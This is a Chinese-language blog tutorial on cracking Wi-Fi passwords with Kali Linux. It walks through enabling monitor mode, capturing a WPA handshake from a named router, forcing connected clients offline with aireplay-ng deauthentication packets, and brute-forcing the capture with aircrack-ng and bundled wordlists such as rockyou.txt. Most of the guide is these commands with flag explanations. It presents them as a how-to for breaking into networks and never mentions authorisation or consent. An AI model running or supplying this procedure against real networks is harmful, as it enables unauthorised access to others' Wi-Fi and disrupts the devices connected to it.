今日主题:如何破解WIFI
准备工具
•笔记本一台
•usb无线网卡【我用的是小米的】
•kali系统【可以在虚拟机里装,建议用2019年及以下版本
VMware Workstation15虚拟机安装
可以参考
https://www.jianshu.com/p/552179808ebf
kali安装
可以参考
https://www.cnblogs.com/changjue/p/11244585.html
WIFI加密方式
1. WEP(有线等效加密)——采用WEP64位或者128位数据加密。
2.WPA-PSK[TKIP]———采用预共享秘钥的WI-FI保护访问,采用WPA-PSK标准加密技术,加密类型为TKIP。
3.WPA-PSK[TKIP]+WPA2-PSK[AES]———允许客户端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。
start
一
打开虚拟机,插入usb网卡,把网卡放到虚拟机来
桌面右键,选择Open in Terminal打开终端
二
显示网卡信息
airmon-ng
开启网卡监控
airmon-ng start wlan0
用ifconfig命令查看一下网卡信息
ifconfig
可以看到网卡的名字已经变了
三
扫描WIFI信号
airodump-ng wlan0mon
拿到握手包
airodump-ng -w freedom -c 11 -–bssid 44:97:5A:F2:9E:B0 wlan0mon --ignore-negative-one
解释:
-c:指定信道[ch]
-w:指定抓去握手包的存放位置或者名字,freedom是一会抓去的握手包的名字
--bssid:指定路由器的MAC
再开一个终端输入命令
aireplay-ng -0 10 -a 路由器MAC -c 客户机MAC wlan0mon – -ignore-negative-one
使用airplay-ng工具强制断开已经连接到wifi的设备重新连接路由器,来进行抓去数据包
解释:
-0:指定发送反认证包的个数(阿利伯数字0)
-a:指定路由器的MAC
-c:指定客户机的MAC
出现下图就是抓取成功
破解握手包
aircrack-ng -w dict freedom-*.cap
dict:字典的名字
freedom-*.cap:握手包
破解成功
补充
•系统自带了密码字典,我用的是我自己的
字典位置如下:
/usr/share/john/password.lst
/usr/share/wfuzz/wordlist
/usr/share/ wordlists/rockyou.txt
最后一个路径下的文件默认是压缩的,可以通过以下命令解压
•反向认证的原理是让其中一个客户端下线,然后他再次连接,就可以获取握手包•信号扫描结束或者进程终止:ctrl+c
相关文章:
谁家好人总搞演抢银行啊李修苏婉全本小说资源免费阅读04-30
全本盛景太匆匆:全文+后续+结局(宁若曦沈砚舟)最新章节列表_全本盛景太匆匆:全文+后续+结局全文阅读04-30
再见八零:离婚后我改嫁团长最新小说(时雨沈宴臣)全文阅读04-30
《问山问水未还:结局番外》顾淮笙纪卿璃完整版章节小说在线阅读_问山问水未还:结局番外免费阅读全文04-30
顾淮笙纪卿璃小说问山问水未还:+番外+完结完整全集在线阅读04-30
南方人为什么不装暖气(南方的冬天也很冷,为何不供暖气?)04-30